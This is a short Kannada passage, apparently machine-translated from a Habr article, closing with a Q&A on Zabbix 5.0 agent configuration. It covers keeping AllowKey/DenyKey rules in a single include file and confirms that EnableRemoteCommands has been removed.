ಬಳಸಲಾಗುವ ಮತ್ತು ಸರಳ ಪರಿಹಾರ.

ನಿಮ್ಮ ಪ್ರಶ್ನೆ. ಇನ್‌ಕ್ಲೂಡ್ ಫೈಲ್‌ಗಳನ್ನು ವರ್ಣಮಾಲೆಯ ಕ್ರಮದಲ್ಲಿ ಸೇರಿಸಲಾಗಿಲ್ಲವೇ?

ಉತ್ತರಿಸಿ. ನನಗೆ ತಿಳಿದಿರುವಂತೆ, ನೀವು ವಿವಿಧ ಫೈಲ್‌ಗಳಲ್ಲಿ ನಿಯಮಗಳನ್ನು ಹರಡಿದರೆ ನಿಯಮಗಳನ್ನು ಅನ್ವಯಿಸುವ ಕ್ರಮವನ್ನು ಊಹಿಸಲು ವಾಸ್ತವಿಕವಾಗಿ ಅಸಾಧ್ಯ. ಒಂದು ಸೇರಿಸಿ ಫೈಲ್‌ನಲ್ಲಿ ಎಲ್ಲಾ AllowKey/DenyKey ನಿಯಮಗಳನ್ನು ಸಂಗ್ರಹಿಸಲು ನಾನು ಶಿಫಾರಸು ಮಾಡುತ್ತೇವೆ, ಏಕೆಂದರೆ ಅವುಗಳು ಪರಸ್ಪರ ಸಂವಹನ ನಡೆಸುತ್ತವೆ ಮತ್ತು ಈ ಫೈಲ್ ಸೇರಿದಂತೆ.

ನಿಮ್ಮ ಪ್ರಶ್ನೆ. Zabbix 5.0 ನಲ್ಲಿ ಆಯ್ಕೆ 'EnableRemoteCommands=' ಕಾನ್ಫಿಗರೇಶನ್ ಫೈಲ್‌ನಿಂದ ಕಾಣೆಯಾಗಿದೆ ಮತ್ತು AllowKey/DenyKey ಮಾತ್ರ ಲಭ್ಯವಿದೆಯೇ?

ಉತ್ತರ. ಹೌದು ಅದು ಸರಿ.

ನಿಮ್ಮ ಗಮನಕ್ಕೆ ಧನ್ಯವಾದಗಳು!

ಮೂಲ: www.habr.com